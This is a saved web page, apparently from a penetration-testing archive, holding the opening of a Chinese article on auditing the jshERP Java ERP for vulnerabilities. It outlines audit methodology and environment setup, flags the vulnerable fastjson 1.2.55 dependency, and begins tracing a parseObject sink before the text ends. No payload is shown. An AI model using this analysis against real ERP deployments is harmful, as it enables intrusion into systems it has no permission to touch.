Penetration_Testing_POC/books/深入学习Java代码审计技巧—详细剖析某erp漏洞(华夏ERP-jshERP).html

1385 lines
7.7 MiB
HTML
Raw Normal View History

2024-05-04 17:44:39 +08:00
<!DOCTYPE html> <html lang=en style><!--
Page saved with SingleFile
url: https://xz.aliyun.com/t/13525
--><meta charset=utf-8>
<title>深入学习Java代码审计技巧—详细剖析某erp漏洞(华夏ERP-jshERP)</title>
<meta name=description content=先知社区,先知安全技术社区>
<meta name=viewport content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<style>/*!
* Bootstrap v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}footer{display:block}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:hover,a:active{outline:0}img{height:auto;vertical-align:middle;-ms-interpolation-mode:bicubic}input{margin:0}button{-webkit-appearance:button}body{margin:0;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:20px;color:#333}a{text-decoration:none}a:hover,a:focus{color:#005580;text-decoration:underline}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}.container{width:940px}.span10{width:780px}.container{margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;line-height:0;content:""}.container:after{clear:both}p{margin:0 0 10px}strong{font-weight:bold}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h3,h4{margin:10px 0;font-family:inherit;font-weight:bold;line-height:20px;color:inherit;text-rendering:optimizelegibility}h4{font-size:17.5px}ul{padding:0}hr{margin:20px 0;border:0;border-top:1px solid #eee;border-bottom:1px solid #fff}code,pre{color:#333;-webkit-border-radius:3px;-moz-border-radius:3px}code{color:#d14;white-space:nowrap;border:1px solid #e1e1e8}pre{display:block;margin:0 0 10px;word-break:break-all;white-space:pre-wrap;border:1px solid rgba(0,0,0,0.15);-webkit-border-radius:4px;-moz-border-radius:4px}pre code{color:inherit}input{font-weight:normal}input{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}input[type="text"]{display:inline-block;padding:4px 6px;margin-bottom:10px;font-size:14px;line-height:20px;vertical-align:middle;-webkit-border-radius:4px;-moz-border-radius:4px}input{width:206px}input[type="text"]{background-color:#fff;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border linear .2s,box-shadow linear .2s;-moz-transition:border linear .2s,box-shadow linear .2s;-o-transition:border linear .2s,box-shadow linear .2s;transition:border linear .2s,box-shadow linear .2s}textarea:focus,input[type="text"]:focus,input[type="password"]:focus,input[type="datetime"]:focus,input[type="datetime-local"]:focus,input[type="date"]:focus,input[type="month"]:focus,input[type="time"]:focus,input[type="week"]:focus,input[type="number"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="color"]:focus,.uneditable-input:focus{border-color:rgba(82,168,236,0.8);outline:0;outline:thin dotted \9;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6)}input::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:#999}input{margin-left:0}input:focus:invalid,textarea:focus:invalid,select:focus:invalid{color:#b94a48;border-color:#ee5f5b}input:focus:invalid:focus,textarea:focus:invalid:focus,select:focus:invalid:focus{border-color:#e9322d;-webkit-box-shadow:0 0 6px #f8b9b7;-moz-box-shadow:0 0 6px #f8b9b7;box-shadow:0 0 6px #f8b9b7}.fade{opacity:0;-webkit-transition:opacity .15s linear;-moz-transition:opacity .15s linear;-o-transition:opacity .15s linear}.collapse{position:relative;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.btn{text-shadow:0 1px 1px rgba(255,255,255,0.75);vertical-align:middle;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));background-image:-webkit-linear-gradient(top,#fff,#e6e6e6);background-image:-o-linear-gradient(top,#fff,#e6e6e6);background-repeat:repeat-x;border:1px solid #ccc;border-bottom-color:#b3b3b3;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-b
<style>/*! Editor.md v1.5.0 | editormd.min.css | Open source online markdown editor. | MIT License | By: Pandao | https://github.com/pandao/editor.md | 2015-06-09 *//*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*! github-markdown-css | The MIT License (MIT) | Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com) | https://github.com/sindresorhus/github-markdown-css */.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;overflow:hidden}.markdown-body *{-moz-box-sizing:border-box}.markdown-body a:active,.markdown-body a:hover{outline:0;text-decoration:underline}.markdown-body>:first-child{margin-top:0 !important}.markdown-body>:last-child{margin-bottom:0 !important}.markdown-body img{-moz-box-sizing:border-box}.markdown-body code:after,.markdown-body code:before{letter-spacing:-.2em;content:" "}.markdown-body pre code:after,.markdown-body pre code:before{content:normal}/*! Pretty printing styles. Used with prettify.js. */@media screen{}@media screen{}</style>
<style>/*!
* Bootstrap Responsive v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}@-ms-viewport{width:device-width}@media(min-width:768px) and (max-width:979px){}@media(max-width:767px){}@media(min-width:1200px){.row{margin-left:-30px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:30px}.container{width:1170px}.span10{width:970px}input{margin-left:0}}@media(min-width:768px) and (max-width:979px){.row{margin-left:-20px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:20px}.container{width:724px}.span10{width:600px}input{margin-left:0}}@media(max-width:767px){body{padding-right:0px;padding-left:0px}.container{width:auto}.row{margin-left:0}[class*="span"]{display:block;float:none;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.modal{position:fixed;right:20px;left:20px;width:auto;margin:0}.modal.fade{top:-100px}}@media(max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.modal{top:10px;right:10px;left:10px}}@media(max-width:979px){body{padding-top:0}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px}.nav-collapse{clear:both}.nav-collapse.collapse{height:0;overflow:hidden}}@media(min-width:980px){.nav-collapse.collapse{height:auto !important;overflow:visible !important}}</style>
<style>li{line-height:26px}a:hover{text-decoration:none}.post-user-action>span{margin-right:10px;line-height:21px;border:0}.post-user-action .i-seprator{color:rgba(0,0,0,0.1);margin:0 2px}.navbar .brand{padding:0;height:50px;margin-left:0;display:inline-block !important;background-repeat:no-repeat;width:120px;background-size:207px 50px;background-image:url()}.brand-box{position:absolute}.related-section{min-height:42px;padding:5px 0;margin-top:25px;border-top:1px solid #eee}.related-section>.related-
<style>a{color:#778087}.topic-list p{margin:0}.topic-content{min-height:40px}.collapse form{position:relative;width:300px;float:right}div.search{padding:10px 0}.d1 input{height:20px;padding-left:18px;border:1px solid #ddd;border-radius:15px;outline:0;background:#fff;color:#9e9c9c;float:right}.vote{font-weight:normal;margin-left:6px}.topic-list{word-break:break-all;word-wrap:break-word}ul{margin:0 0 10px 0}/*!*border-bottom: solid #eee 1px;*!*/.user-info{padding:5px 0 5px 0}.topic-info a,.topic-info{padding-top:5px}.topic-info a:hover{text-decoration:solid}.reminder{min-height:200px;border:1px #ddd solid;border-radius:3px;line-height:200px;text-align:center}</style>
<style>body{background-color:#eee}form{margin:0 !important}a:focus{text-decoration:none}.markdown-body p>code{white-space:normal;word-break:break-all;border:none !important}.box ul,ol{margin-bottom:0px !important}.markdown-body ul{list-style-type:disc}.markdown-body ul,.markdown-body ol{margin:0 0 24px 0 !important}.box a:hover{text-decoration:none}.box-container>ul>li{list-style-type:none}#Wrapper .row.box{margin-left:0px}.navbar-inner{border-radius:0px;min-height:40px;padding-right:0px;padding-left:0px;outline:0;margin-bottom:0;list-style:none;z-index:1050;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,0.08);box-shadow:0 1px 4px rgba(0,21,41,0.08);line-height:46px;-webkit-transition:background .3s,width .2s;-o-transition:background .3s,width .2s;transition:background .3s,width .2s}.bs-docs-footer{text-align:left;color:#99979c;height:64px;background-color:#FFF;border-top:1px solid rgba(0,0,0,0.22);line-height:64px}.bs-docs-footer .links>a{display:inline-block;padding:0 12px;border-left:1px solid #e8e8e8;color:#8c8c8c;line-height:1}.bs-docs-footer .links>a:first-child{border-left:0}.box-container .user-info{margin-bottom:10px;background:#fff}.content-title{font-size:24px;color:#333;text-decoration:none;line-height:24px;text-shadow:0 1px 0#fff}.markdown-body h1,.markdown-body h2{border-bottom:0}.box-container{padding:20px}.breadcrumb{padding:8px 10px 8px 15px;margin-bottom:10px;border-radius:0;color:#000;background-color:#fff}.breadcrumb>li{text-shadow:none !important;margin:2px 0px}.active{text-shadow:none !important}.breadcrumb .active{color:#555;display:inline-block;text-shadow:none !important}.label{background-color:#f4f4f4;line-height:12px;display:inline-block;padding:4px 4px 4px 4px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;text-decoration:none;text-shadow:none;font-weight:normal}.topic-info{color:#999 !important;font-size:12px !important}.topic-info a{padding:0px;color:#555 !important;font-size:12px !important}.topic-info a:hover{color:#4d5256;text-decoration:underline}.topic-info .cell{padding-left:0 !important;margin-left:0px;font-size:10px;font-weight:bold}.markdown-body img{max-width:90% !important;text-align:center;margin-left:auto;margin-right:auto;display:block;padding:10px 0px 10px 0px}.topic-info span{margin-left:0px;font-size:10px;color:rgba(0,0,0,0.45)}.btn{display:inline-block;padding:4px 12px;margin-bottom:0;font-size:14px;line-height:20px;background-color:#f4f4f4;color:#444;border-color:#ddd;font-family:"Helvetica Neue For Number",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"PingFang SC","Hiragino Sans GB","Microsoft YaHei","Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;list-style:none;font-weight:400;text-align:center;cursor:pointer;background-image:none;white-space:nowrap;border-radius:2px;height:32px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.box{font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:14px;line-height:1.5;color:rgba(0,0,0,0.65);-webkit-box-sizing:border-box;box-sizing:border-box;margin-top:0 !important;margin-bottom:20px;padding:0;list-style:none;background:#fff;border-radius:2px;position:relative;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s;-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);-webkit-box-shadow:0 1px 1px rgba(143,168,191,.35);box-shadow:0 1px 1px rgba(143,168,191,.35);border-bottom:1px solid #e2e2e9}.span10{float:left;min-height:1px}#Wrapper .span10{margin-left:0px !important;max-width:960px}@media(min-width:1200px){.container{width:82% !important}}@media screen and (min-width:1500px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px !important}#Wrapper .span10{max-width:810px !important}}@media screen and (min-width:980px) and (max-width:1499px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px !importa
<style>/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/.pull-right{float:right}.pull-left{float:left}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*! github-markdown-css | The MIT License (MIT) | Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com) | https://github.com/sindresorhus/github-markdown-css */.markdown-body{color:#333;font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:15px;line-height:24px;letter-spacing:.05em;word-wrap:break-word}.markdown-body a{background:transparent}.markdown-body a:active,.markdown-body a:hover{outline:0}.markdown-body strong{font-weight:bold}.markdown-body h1{margin:.67em 0}.markdown-body img{border:0}.markdown-body pre{font-family:"Meiryo UI","YaHei Consolas Hybrid",Consolas,"Malgun Gothic","Segoe UI","Trebuchet MS",Helvetica,monospace,monospace}.markdown-body *{-moz-box-sizing:border-box;box-sizing:border-box}.markdown-body a{color:#4183c4;text-decoration:none}.markdown-body a:hover,.markdown-body a:active{text-decoration:underline}.markdown-body ul,.markdown-body ol{padding:0}.markdown-body code{font-family:Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body pre{font:12px Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body h4{position:relative;margin-top:1em;margin-bottom:16px;font-weight:bold;line-height:1.4}.markdown-body h1{padding-bottom:0em;font-size:28px;line-height:1.2}.markdown-body h2{padding-bottom:0em;font-size:24px;line-height:1.225}.markdown-body h3{font-size:20px;line-height:1.43}.markdown-body h4{font-size:18px}.markdown-body p,.markdown-body ul,.markdown-body ol,.markdown-body pre{margin-top:0;margin-bottom:24px}.markdown-body ul,.markdown-body ol{padding-left:2em}.markdown-body ul ul{margin-top:0;margin-bottom:0}.markdown-body li>p{margin-top:16px}.markdown-body img{max-width:100%;-moz-box-sizing:border-box;box-sizing:border-box}.markdown-body code{padding:0;padding-top:.2em;padding-bottom:.2em;margin:0;font-size:85%;background-color:rgba(0,0,0,0.04);border-radius:3px}.markdown-body code:before,.markdown-body code:after{letter-spacing:-0.2em;content:" "}.markdown-body pre>code{font-size:100%;word-break:normal;white-space:pre;background:transparent}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight pre,.markdown-body pre{padding:16px;overflow:auto;font-size:85%;background-color:#f7f7f7;border-radius:3px}.markdown-body .highlight pre{margin-bottom:0;word-break:normal}.markdown-body pre{word-wrap:normal}.markdown-body pre code{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}.markdown-body pre code:before,.markdown-body pre code:after{content:normal}/*! Pretty printing styles. Used with prettify.js. */@media screen{}.markdown-body .highlight pre,.markdown-body pre{line-height:1.6}@media screen{}</style>
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .p{color:#000;font-weight:bold}.highlight .cm{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nc{color:#000}.highlight .nd{color:#5c35cc;font-weight:bold}.highlight .nf{color:#000}.highlight .nx{color:#000}.highlight .nt{color:#204a87;font-weight:bold}.highlight .nv{color:#000}.highlight .mi{color:#0000cf;font-weight:bold}.highlight .s2{color:#4e9a06}.highlight .si{color:#4e9a06}.highlight .s1{color:#4e9a06}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media(max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style>@media(pointer:coarse){@media only screen and (max-device-width:1024px){}@media only screen and (max-device-width:414px){}@media only screen and (max-device-width:320px){}}</style><style>@media screen and (max-width:768px){}</style><style>/*!
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F13525&amp;from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>深入学习Java代码审计技巧—详细剖析某erp漏洞</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/61227>
<span class="username cell"> Dili</span></a> <span class=i-seprator> / </span>
<span> 2024-02-01 23:59:56</span><span class=i-seprator> / </span>
<span>发表于江西 / </span>
<span>浏览数 3181</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(1)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<h1>深入学习Java代码审计技巧—详细剖析某erp漏洞</h1>
<h2 id=toc-0>简介</h2>
<p>对于Java代码审计主要的审计步骤如下</p>
<ul>
<li>确定项目技术框架、项目结构</li>
<li>环境搭建</li>
<li>配置文件的分析如pom.xml、web.xml等特别是pom.xml可以从组件中寻找漏洞</li>
<li>Filter分析Filter是重要的组成部分提前分析有利于把握项目对请求的过滤在后续漏洞利用时能够综合分析</li>
<li>路由分析部分项目请求路径与对用的controller方法不对应提前通过抓包调试分析了解前端请求到后端方法的对应关系便于在后续分析中更快定位代码</li>
<li>漏洞探测<ul>
<li>探测之前可借用工具辅助分析如codeql、fortify、Yakit、BP等</li>
<li>SQL注入分析、RCE分析可先从代码入手通过关键API及特征关键字来进行逆向数据流分析从sink到source判断参数是否可控</li>
<li>XSS、文件上传等漏洞适合正向数据流分析由于存储型XSS数据流断裂从代码层面不好将两条数据流联系起来可以通过前端界面的测试找到插入口和显示处性质一样的点在通过后端代码分析构造出可利用的payload</li>
<li>逻辑漏洞这类也是从前端入手比较好处理,后端代码庞大难以定位</li>
</ul>
</li>
</ul>
<p>个人观点,仅供参考</p>
<h2 id=toc-1>文件结构分析</h2>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232812-82abb8ec-c116-1.png title><img src="
<p>在审计项目之前,先了解项目的结构</p>
<ul>
<li>src/main/java存放java核心代码里面包含controller、service、filter、dao等还包括主函数ErpApplication</li>
<li>src/main/resources包含mybatis配置文件properties等</li>
<li>erp_web里面存放的是该网站的html、css及js文件</li>
<li>docs包含数据库文件及文档文件等</li>
<li>test项目的测试目录</li>
<li>pom.xml项目的依赖配置</li>
</ul>
<h2 id=toc-2>环境搭建</h2>
<p><strong>数据库创建</strong></p>
<div class=highlight><pre><span></span><span class=n>mysql</span> <span class=o>-</span><span class=n>u</span> <span class=n>root</span> <span class=o>-</span><span class=n>h</span> <span class=mi>127</span><span class=p>.</span><span class=mi>0</span><span class=p>.</span><span class=mi>0</span><span class=p>.</span><span class=mi>1</span> <span class=o>-</span><span class=n>p</span>
<span class=k>create</span> <span class=k>database</span> <span class=n>jsh_erp</span><span class=p>;</span>
<span class=n>use</span> <span class=n>jsh_erp</span><span class=p>;</span>
<span class=k>source</span> <span class=n>D</span><span class=p>:</span><span class=o>/</span><span class=n>audit</span><span class=o>-</span><span class=n>code</span><span class=o>/</span><span class=n>java</span><span class=o>/</span><span class=n>jshERP</span><span class=o>-</span><span class=mi>2</span><span class=p>.</span><span class=mi>3</span><span class=o>/</span><span class=n>docs</span><span class=o>/</span><span class=n>jsh_erp</span><span class=p>.</span><span class=k>sql</span>
</pre></div>
<p><strong>项目启动</strong></p>
<p>application.properties文件中配置数据库连接信息及server和port启动主类ErpApplication.java即可</p>
<h2 id=toc-3>配置文件分析</h2>
<p>在对项目开始审计之前,需要先了解其配置文件</p>
<ul>
<li><p>application.propertiesSpring的全局配置文件里面包含server的ip及port同时还有数据库连接信息在环境搭建时可修改</p>
</li>
<li><p>pom.xml项目的组件依赖审计开始前先了解依赖的组件并判断是否存在对应组件版本的漏洞这也可以是漏洞挖掘的第一步</p>
<p><strong>依赖fastjson</strong></p>
<div class=highlight><pre><span></span><span class=nt>&lt;dependency&gt;</span>
<span class=nt>&lt;groupId&gt;</span>com.alibaba<span class=nt>&lt;/groupId&gt;</span>
<span class=nt>&lt;artifactId&gt;</span>fastjson<span class=nt>&lt;/artifactId&gt;</span>
<span class=nt>&lt;version&gt;</span>1.2.55<span class=nt>&lt;/version&gt;</span>
<span class=nt>&lt;/dependency&gt;</span>
</pre></div>
<p>1.2.55版本存在反序列化漏洞,现在需要寻找利用点,全局搜索<code>parseObject</code>方法</p>
</li>
</ul>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232832-8ed53be8-c116-1.png><img src=
<p>猜测search可能可控进入分析</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kd>static</span> <span class=n>String</span> <span class=nf>getInfo</span><span class=o>(</span><span class=n>String</span> <span class=n>search</span><span class=o>,</span> <span class=n>String</span> <span class=n>key</span><span class=o>){</span>
<span class=n>String</span> <span class=n>value</span> <span class=o>=</span> <span class=s>""</span><span class=o>;</span>
<span class=k>if</span><span class=o>(</span><span class=n>search</span><span class=o>!=</span><span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>JSONObject</span> <span class=n>obj</span> <span class=o>=</span> <span class=n>JSONObject</span><span class=o>.</span><span class=na>parseObject</span><span class=o>(</span><span class=n>search</span><span class=o>);</span>
<span class=n>value</span> <span class=o>=</span> <span class=n>obj</span><span class=o>.</span><span class=na>getString</span><span class=o>(</span><span class=n>key</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>value</span><span class=o>.</span><span class=na>equals</span><span class=o>(</span><span class=s>""</span><span class=o>))</span> <span class=o>{</span>
<span class=n>value</span> <span class=o>=</span> <span class=kc>null</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>value</span><span class=o>;</span>
